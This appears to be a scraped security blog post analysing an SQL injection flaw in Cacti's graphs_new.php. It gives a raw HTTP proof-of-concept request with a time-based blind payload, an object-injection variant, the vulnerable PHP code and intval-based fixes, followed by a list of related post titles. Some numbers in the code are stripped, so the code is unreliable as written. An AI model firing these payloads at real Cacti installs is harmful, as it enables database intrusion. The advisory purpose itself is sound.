catalogue

. 漏洞描述

. 漏洞触发条件

. 漏洞影响范围

. 漏洞代码分析

. 防御方法

. 攻防思考

1. 漏洞描述

other SQL injection vulnerability via graphs_new.php in cacti was found, reported to the bug http://bugs.cacti.net/view.php?id=2652

Relevant Link:

http://bobao.360.cn/snapshot/index?id=146936

2. 漏洞触发条件

0x1: POC1: SQL Inject

POST /cacti/graphs_new.php HTTP/1.1

Host: 192.168.217.133

Proxy-Connection: keep-alive

Cache-Control: max-age=

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Origin: http://192.168.217.133 [^]

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36

Content-Type: application/x-www-form-urlencoded

DNT: 1

Referer: http://192.168.217.133/cacti/graphs_new.php?host_id=3 [^]

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4

Cookie: 1c4af7f2e90e3a789e67a8e3acd2372f=8a83va6ijomgf7qdgfpcl8l1p2; Cacti=j8chtc1ppq4n7viqkbah6c4tv2

Content-Length: 189

__csrf_magic=sid%3Aed226a87fdcc8e055d1c27b620e564d629d95e40%2C1450241184&cg_g=033926697+xor+(select(0)from(select sleep(5))v)&save_component_graph=1&host_id=2&host_template_id=0&action=save

0x2: POC2: Object Inject

. Login

. POST  http://target/cacti/graphs_new.php

   Data: __csrf_magic=sid%3A55c34c49f0a1e4abf5739766855abdfa96fbc91b%2C1448716384&action=save&save_component_new_graphs=&host_id=&selected_graphs_array=[injection]

    {Injection exp can be found on my server: http://pandas.pw/cacti.exp}

. mysql log: select graph_template_id from snmp_query_graph where id= and benchmark(,sha1())--

3. 漏洞影响范围
4. 漏洞代码分析

0x1: Vuls-1: Object Inject To SQL Inject

/graphs_new.php

/* set default action */

if (!isset($_REQUEST["action"])) { $_REQUEST["action"] = ""; }

switch ($_REQUEST["action"]) {

    case 'save':

        //track function form_save

        form_save();

        break;

    case 'query_reload':

        host_reload_query();

        header("Location: graphs_new.php?host_id=" . $_GET["host_id"]);

        break;

    default:

        include_once("./include/top_header.php");

        graphs();

        include_once("./include/bottom_footer.php");

        break;

}

form_save();

function form_save()

{

    ..

    if (isset($_POST["save_component_new_graphs"]))

    {

        //Track function host_new_graphs_save()

        host_new_graphs_save();

        header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);

    }

}

host_new_graphs_save();

function host_new_graphs_save()

{

    //variable $selected_graphs_array just unserialized the POST variable which we can control without filter.

    $selected_graphs_array = unserialize(stripslashes($_POST["selected_graphs_array"]));

    ..

    //Then the variable goes into a  three-dimensional array , and finally the dirty data we can control enter into the select database query, which caused a SQL injection.

    $graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . $snmp_query_array["snmp_query_graph_id"]);

    ..

}

0x2: Vuls-2: SQL Injection

function form_save()

{

    if (isset($_POST["save_component_graph"]))

    {

        /* summarize the 'create graph from host template/snmp index' stuff into an array */

        while (list($var, $val) = each($_POST))

        {

            if (preg_match('/^cg_(\d+)$/', $var, $matches))

            {

                $selected_graphs["cg"]{$matches[]}{$matches[]} = true;

            }

            //cg_g is not filtered

            elseif (preg_match('/^cg_g$/', $var))

            {

                if ($_POST["cg_g"] > )

                {

                    $selected_graphs["cg"]{$_POST["cg_g"]}{$_POST["cg_g"]} = true;

                }

            }

            elseif (preg_match('/^sg_(\d+)_([a-f0-9]{32})$/', $var, $matches))

            {

                $selected_graphs["sg"]{$matches[]}{$_POST{"sgg_" . $matches[]}}{$matches[]} = true;

            }

        }

        if (isset($selected_graphs))

        {

            //外部输入参数带入host_new_graphs中

            host_new_graphs($_POST["host_id"], $_POST["host_template_id"], $selected_graphs);

            exit;

        }

        header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);

    }

    if (isset($_POST["save_component_new_graphs"])) {

        host_new_graphs_save();

        header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);

    }

}

host_new_graphs($_POST["host_id"], $_POST["host_template_id"], $selected_graphs);

function host_new_graphs($host_id, $host_template_id, $selected_graphs_array) {

    /* we use object buffering on this page to allow redirection to another page if no

    fields are actually drawn */

    ob_start();

    include_once("./include/top_header.php");

    print "<form method='post' action='graphs_new.php'>\n";

    $snmp_query_id = ;

    $num_output_fields = array();

    while (list($form_type, $form_array) = each($selected_graphs_array)) {

        while (list($form_id1, $form_array2) = each($form_array)) {

            if ($form_type == "cg") {

                //sql injection in graph_template_id

                $graph_template_id = $form_id1; 

                html_start_box("<strong>Create Graph from '" . db_fetch_cell("select name from graph_templates where id=$graph_template_id") . "'", "100%", "", "", "center", "");

Relevant Link:

http://seclists.org/fulldisclosure/2015/Dec/att-57/cacti_sqli%281%29.txt

http://bugs.cacti.net/view.php?id=2652

5. 防御方法

/graphs_new.php

function host_new_graphs_save()

{

    ..

    /*$graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . $snmp_query_array["snmp_query_graph_id"]);*/

    $graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . intval($snmp_query_array["snmp_query_graph_id"]));

    ..

}

/graphs_new.php

function host_new_graphs($host_id, $host_template_id, $selected_graphs_array) {

    /* we use object buffering on this page to allow redirection to another page if no

    fields are actually drawn */

    ob_start();

    include_once("./include/top_header.php");

    print "<form method='post' action='graphs_new.php'>\n";

    $snmp_query_id = ;

    $num_output_fields = array();

    while (list($form_type, $form_array) = each($selected_graphs_array)) {

        while (list($form_id1, $form_array2) = each($form_array)) {

            if ($form_type == "cg") {

                //sql injection in graph_template_id

                $graph_template_id = $form_id1;

                /**/

                $graph_template_id = intval($graph_template_id);

                /**/

                html_start_box("<strong>Create Graph from '" . db_fetch_cell("select name from graph_templates where id=$graph_template_id") . "'", "100%", "", "", "center", "");

Relevant Link:

http://www.cacti.net/download_cacti.php

6. 攻防思考

Copyright (c) 2016 Little5ann All rights reserved

Cacti /graphs_new.php SQL Injection Vulnerability的更多相关文章

  1. FlarumChina SQL injection Vulnerability

    First,We need to download our vulnerable program in GitHub links:https://github.com/skywalker512/Fla ...

  2. DRUPAL-PSA-CORE-2014-005 && CVE-2014-3704 Drupal 7.31 SQL Injection Vulnerability /includes/database/database.inc Analysis

    目录 . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 Use Drupal to build everything from perso ...

  3. Dede(织梦) CMS SQL Injection Vulnerability

    测试方法: @Sebug.net   dis本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! # Dede Cms All Versions Sql Vulnerability ...

  4. MyBB 18 SQL Injection Vulnerability

    <?php error_reporting(0); ?> <form method="post" action=""> Input a ...

  5. Zabbix 3.0.3 SQL Injection

    Zabbix version 3.0.3 suffers from a remote SQL injection vulnerability. ============================ ...

  6. Portswigger web security academy:SQL injection

    Portswigger web security academy:SQL injection 目录 Portswigger web security academy:SQL injection SQL ...

  7. CVE: 2014-6271、CVE: 2014-7169 Bash Specially-crafted Environment Variables Code Injection Vulnerability Analysis

    目录 . 漏洞的起因 . 漏洞原理分析 . 漏洞的影响范围 . 漏洞的利用场景 . 漏洞的POC.测试方法 . 漏洞的修复Patch情况 . 如何避免此类漏洞继续出现 1. 漏洞的起因 为了理解这个漏 ...

  8. SQL injection

    SQL injection is a code injection technique, used to attack data-driven applications, in which malic ...

  9. ref:Manual SQL injection discovery tips

    ref:https://gerbenjavado.com/manual-sql-injection-discovery-tips/ Manual SQL injection discovery tip ...

随机推荐

  1. listview+seekbar问题的解决

    最近做了个项目,其中有录音播放功能.每次录音结束都会在listView中显示,在listView中能播放每次的录音,也可以每条录音之间的切换播放.随之就引发了许多的问题,比如当我播放第一条录音的时所有 ...

  2. Java的性能优化

    http://www.toutiao.com/i6368345864624144897/?tt_from=mobile_qq&utm_campaign=client_share&app ...

  3. Working Set缓存算法(转)

    为了加深对缓存算法的理解,特转此篇,又由于本文内容过多,故不做翻译,原文地址Working Set页面置换算法 In the purest form of paging, processes are ...

  4. Linux下网络流量实时监控工具

    Linux下网络流量实时监控工具大全 在工作中发现,经常因为业务的原因,需要即时了解某台服务器网卡的流量,虽然公司也部署了cacti软件,但cacti是五分钟统计的,没有即时性,并且有时候打开监控页面 ...

  5. dnsunlocker解决

    环境:windows 10 中文企业版,firefox47, chrome51 安装了某个国外程序后,浏览器各种不正常,打开网页慢,或是无法打开,更严重的是会弹广告,各种广告. 然后在控制面板中卸载了 ...

  6. css 图片的无缝滚动

    转载:http://blog.sina.com.cn/s/blog_6387e82401013kx8.html js的图片的横向或者竖向的无缝滚动图片. ttp://zx.bjmylike.com/ ...

  7. STM32 C语言,端口映射

    static XX 有记忆的定义 typedef XX 可以多次定义一个 #ifedf XXX XXX(程序段1) #else XXX(程序段2)

  8. python2.X和3.X的一些区别【整理中】

    1.性能 Py3.0运行 pystone benchmark的速度比Py2.5慢30%.Guido认为Py3.0有极大的优化空间,在字符串和整形操作上可  以取得很好的优化结果.  Py3.1性能比P ...

  9. 【python】实践中的总结——列表『持续更新中』

    2016-04-03 21:02:50 python list的遍历 list[a::b]   #从list[a] 开始,每b个得到一个元组,返回新的list 举个例子: >>> l ...

  10. 使用webpack搭建vue开发环境

    最近几天项目上使用了vue.js作为一个主要的开发框架,并且为了发布的方便搭配了webpack一起使用.CSS框架使用的是vue-strap(vue 对bootstrap控件做了封装)这篇文章主要总结 ...